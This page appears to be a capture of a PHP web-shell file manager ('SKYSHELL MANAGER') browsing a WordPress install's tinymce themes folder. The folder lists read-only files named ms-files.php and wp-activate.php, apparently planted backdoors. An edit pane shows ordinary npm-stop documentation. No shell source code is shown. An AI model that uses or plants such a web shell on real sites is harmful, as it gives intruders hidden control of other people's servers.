📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: npm-stop.md
--- title: npm-stop section: 1 description: Stop a package --- ### Synopsis <!-- AUTOGENERATED USAGE DESCRIPTIONS --> ### Description This runs a predefined command specified in the "stop" property of a package's "scripts" object. Unlike with [npm start](/commands/npm-start), there is no default script that will run if the `"stop"` property is not defined. ### Example ```json { "scripts": { "stop": "node bar.js" } } ``` ```bash npm stop > npm@x.x.x stop > node bar.js (bar.js output would be here) ``` ### Configuration <!-- AUTOGENERATED CONFIG DESCRIPTIONS --> ### See Also * [npm run-script](/commands/npm-run-script) * [npm scripts](/using-npm/scripts) * [npm test](/commands/npm-test) * [npm start](/commands/npm-start) * [npm restart](/commands/npm-restart)
Save